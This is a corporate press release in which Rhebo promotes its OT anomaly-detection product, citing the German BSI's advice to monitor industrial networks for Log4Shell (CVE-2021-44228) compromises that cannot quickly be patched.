Why the BSI recommends anomaly detection to identify Log4Shell-related attacks

In its working paper »Critical Vulnerability in Log4j – Detection and Response«, the German Federal Office for Information Security (BSI) underlines the persistent and complex danger of the Log4Shell vulnerability in industrial networks as well. Patching the vulnerability in the short to medium term is considered unrealistic for many companies. For this reason, the BSI recommends continuous monitoring and analysis of network communication via anomaly detection in addition to rule-based query analysis. Industrial anomaly detection solutions, as offered by Rhebo, a Landis+Gyr Company, enable companies to detect on compromises that have already occurred, active exploits and other malicious activities in the operational technology (OT) and industrial control systems (ICS) at an early stage. The vulnerability, documented as CVE-2021-44228, allows attackers to execute arbitrary code on systems using the widespread Log4j library without authentication.

Fast and complete security patching unlikely

»Naturally, the first priority is to update all existing Log4j libraries in the company to the most recent version. However, many companies are thus embarking on the proverbial search for the needle in the haystack,« said Rhebo CTO Martin Menschner. Companies often lack clarity over which applications use the vulnerable library. Moreover, as the BSI explicitly points out, it is not sufficient to update the Log4j library via the global software management of operating systems. They stress the point that only the respective »software manufacturers who have integrated the library into their programs [can] carry out the update.« The resulting mitigation complexity is further complicated by the fact that Log4j has already been updated several times since the vulnerability became known.

In addition, according to the BSI, all known mitigation measures that affect the use of the library are currently based on disabling the problematic functionality. Systems in companies that are absolutely dependent on the functionality of the Log4j library thus run the risk of no longer being functional after implementation. Particularly companies providing critical services, for example critical infrastructures and industrial companies, find themselves in a catch-22 situation.

In addition, companies should not be lulled into a sense of security even after an update. »The Log4Shell vulnerability could already have been exploited in some companies. This means that adversaries might have already compromised IT or – via lateral movement – Operational Technology (OT) networks and established access via backdoors,« adds Martin Menschner. After all, the vulnerability has existed for over a year. And security organizations worldwide have observed a massive increase in network scans and attacks since Log4Shell officially became known in December 2021 (see also Rhebo’s commentary on Log4Shell).

Anomaly detection should be a priority

For these reasons, the BSI recommends that organizations immediately implement enhanced measures to detect suspicious and malicious communications. In addition to the evaluation of request data (e.g., via web server logs), the BSI explicitly mentions anomaly detection at the network level. »This solution not only detects previously unknown attack patterns typical of zero-day vulnerabilities,« added Martin Menschner. »It also reports operations that indicate existing compromises, such as lateral movement, scans, change of functions and command structures in systems.« Rhebo’s Next Generation OT Intrusion Detection offers a solution tailored specifically to Operational Technology networks and Industrial Control Systems.

The OT Monitoring observes all communication within an industrial network, while the integrated Threat and Intrusion Detection identifies any anomaly, i.e. deviation, in the communication behavior and reports it in real time. It detects any communication that is novel or unusual in the monitored network and indicative of malicious behavior – from backdoor communications, lateral movement and spoofing activities to direct interference with industrial processes. With anomaly detection, actions of adversaries within the OT network become visible, traceable, and can be mitigated in real time, even if they use previously unknown signatures or have hijacked authenticated user accounts. To get anomaly detection up and running quickly, Rhebo offers on-demand technical operational support as well as a comprehensive managed protection service. To assess the risk of whether a network compromise has already occurred, an OT risk assessment and security analysis is also recommended.

For more information on the Rhebo OT anomaly detection please visit https://rhebo.com/en/our-products/rhebo-industrial-protector/

Über die Rhebo GmbH

Rhebo develops and markets innovative industrial monitoring solutions and services for energy suppliers, industrial companies and critical infrastructures. The company enables its customers to guarantee both cybersecurity and the availability of their OT and IoT infrastructures and thus master the complex challenges of securing industrial networks and smart infrastructures. Since 2021, Rhebo is part of the Landis+Gyr AG, a leading global provider of integrated energy management solutions for the energy industry with around 5,000 employees in over 30 countries worldwide.

Rhebo is a partner of the Alliance for Cyber Security of the Federal Office for Information Security and is actively involved in Teletrust – IT Security Association Germany and Bitkom Working Group on Security Management for the development of security standards. https://rhebo.com/

Firmenkontakt und Herausgeber der Meldung:

Rhebo GmbH
Spinnereistr. 7
04179 Leipzig
Telefon: +49 (341) 393790-180
Telefax: +49 (341) 393790-0
http://www.rhebo.com

Ansprechpartner:
Jens Pacholsky
Public Relations
Telefon: +49 (341) 393790191
E-Mail: jens.pacholsky@rhebo.com
Für die oben stehende Pressemitteilung ist allein der jeweils angegebene Herausgeber (siehe Firmenkontakt oben) verantwortlich. Dieser ist in der Regel auch Urheber des Pressetextes, sowie der angehängten Bild-, Ton-, Video-, Medien- und Informationsmaterialien. Die United News Network GmbH übernimmt keine Haftung für die Korrektheit oder Vollständigkeit der dargestellten Meldung. Auch bei Übertragungsfehlern oder anderen Störungen haftet sie nur im Fall von Vorsatz oder grober Fahrlässigkeit. Die Nutzung von hier archivierten Informationen zur Eigeninformation und redaktionellen Weiterverarbeitung ist in der Regel kostenfrei. Bitte klären Sie vor einer Weiterverwendung urheberrechtliche Fragen mit dem angegebenen Herausgeber. Eine systematische Speicherung dieser Daten sowie die Verwendung auch von Teilen dieses Datenbankwerks sind nur mit schriftlicher Genehmigung durch die United News Network GmbH gestattet.

counterpixel